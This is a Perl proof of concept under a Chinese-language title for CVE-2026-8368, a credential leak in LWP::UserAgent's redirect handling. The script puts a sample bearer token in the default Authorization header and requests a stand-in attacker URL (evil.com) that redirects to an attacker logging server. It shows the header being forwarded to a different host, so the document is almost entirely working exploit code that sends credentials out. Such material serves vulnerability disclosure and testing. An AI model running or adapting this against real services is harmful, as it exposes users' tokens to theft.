CVE-2026-8368 LWP::UserAgent重定向凭据泄露漏洞

#!/usr/bin/perl use strict; use warnings; use LWP::UserAgent; # Create a vulnerable user agent instance my $ua = LWP::UserAgent->new; # Simulate setting sensitive credentials my $secret_token = "Bearer secret-admin-token-12345"; $ua->default_header('Authorization', $secret_token); # The attacker controls 'evil.com' and sets up a redirect # to 'attacker-controlled-server.com/log' my $malicious_url = 'http://evil.com/redirect'; print "[*] Sending request to: $malicious_url\n"; print "[*] Request contains Authorization: $secret_token\n"; # The vulnerable LWP::UserAgent will follow the redirect # and send the Authorization header to the new host my $response = $ua->get($malicious_url); if ($response->is_success) { print "[+] Response received: " . $response->status_line . "\n"; } else { print "[-] Error: " . $response->status_line . "\n"; } # Note: In a real exploit scenario, the server at the redirect target # would log the incoming Authorization header.